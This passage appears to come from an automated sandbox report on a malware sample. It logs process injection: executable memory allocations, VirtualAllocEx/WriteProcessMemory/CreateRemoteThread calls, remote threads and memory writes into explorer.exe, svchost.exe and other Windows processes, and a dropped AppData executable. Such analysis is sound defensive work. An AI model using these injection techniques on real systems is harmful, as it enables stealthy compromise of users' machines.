            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2B40000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 26C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2100000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2510000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: FE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1170000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: E70000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2610000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 5E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: F70000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 550000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: FE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 910000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 24C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1490000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1380000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1310000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 720000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 6B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2530000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 5E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 22F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2ED0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 8F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1050000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 5E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 980000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 990000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2900000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1510000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: A40000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: A90000 protect: page execute and read and writeJump to behavior
            Contains functionality to inject threads in other processes
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_02F00DE0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,2_2_02F00DE0
            Source: C:\Windows\explorer.exeCode function: 3_2_013A1F8D VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,3_2_013A1F8D
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\explorer.exe EIP: 13A08B3Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\sihost.exe EIP: AC090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: 91090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: 9A090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\ctfmon.exe EIP: A5090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\explorer.exe EIP: 138090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: D4090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe EIP: B5090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 11090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe EIP: A9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: AB090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\smartscreen.exe EIP: 29090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe EIP: 58090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 3D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 90090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\ApplicationFrameHost.exe EIP: 18090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe EIP: A1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 19090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\ImmersiveControlPanel\SystemSettings.exe EIP: F1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\oobe\UserOOBEBroker.exe EIP: 1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: 22090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\dllhost.exe EIP: 6E090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\conhost.exe EIP: E6090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 94090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\backgroundTaskHost.exe EIP: 40090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: B0090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: 286090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: 2BB090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: 256090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: 261090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: 252090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: 2B2090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: 145090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: 262090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: EE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: 2D3090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: E4090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 92090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: E4090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 23C090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 10B090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 279090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: A5090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 251090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: CE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 64090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 8E090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 104090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: F9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: A9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 235090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 29B090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 119090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 27F090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2EF090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 28D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2B7090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2BD090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 117090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 94090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 6E090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 14D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2A3090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 5E090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 296090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 301090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 256090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 13C090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 13B090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 25F090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2EF090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 5D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 55090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: A1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: BD090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 55090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2C3090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 25F090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 91090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 94090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2C9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2DA090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 8D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2DC090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2AE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 213090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 72090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 23D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2B4090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 26C090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 210090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 251090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: FE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 117090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: E7090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 261090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 5E090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: F7090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 55090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: FE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 91090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 24C090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 149090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 138090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 131090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 72090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 6B090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 253090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 5E090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 22F090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2ED090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 8F090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 105090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 5E090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 98090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 99090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 290090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 151090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: A4090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: A9090BJump to behavior
            Source: C:\Windows\explorer.exeThread created: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe EIP: 1C090BJump to behavior
            Source: C:\Windows\explorer.exeThread created: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe EIP: 1C090BJump to behavior
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\Windows\SysWOW64\winver.exeMemory written: PID: 2580 base: 13A0000 value: 50Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: PID: 2580 base: 1380000 value: 50Jump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\java.exeMemory written: C:\Windows\SysWOW64\winver.exe base: 4418B0Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\explorer.exe base: 13A0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\sihost.exe base: AC0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\svchost.exe base: 910000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\svchost.exe base: 9A0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\ctfmon.exe base: A50000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\explorer.exe base: 1380000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\svchost.exe base: D40000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 110000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AB0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\smartscreen.exe base: 290000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 3D0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 900000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 180000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 190000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\svchost.exe base: 220000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\dllhost.exe base: 6E0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\conhost.exe base: E60000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 940000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 400000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B00000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2860000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2BB0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2560000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2610000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2520000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2B20000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1450000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2620000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: EE0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2D30000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: E40000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 920000Jump to behavior
